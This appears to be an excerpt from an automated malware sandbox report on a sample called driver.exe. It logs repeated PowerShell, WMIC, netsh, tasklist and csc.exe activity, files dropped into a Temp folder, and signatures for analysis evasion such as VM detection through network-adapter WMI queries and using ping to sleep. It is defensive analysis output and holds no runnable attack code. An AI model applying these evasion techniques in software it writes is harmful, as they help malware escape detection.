Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6258	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6357	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 474	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6117
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1343
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5057
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2549
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3381
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1821
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4302
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2594
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3076
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1443

Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\driver.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57082\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
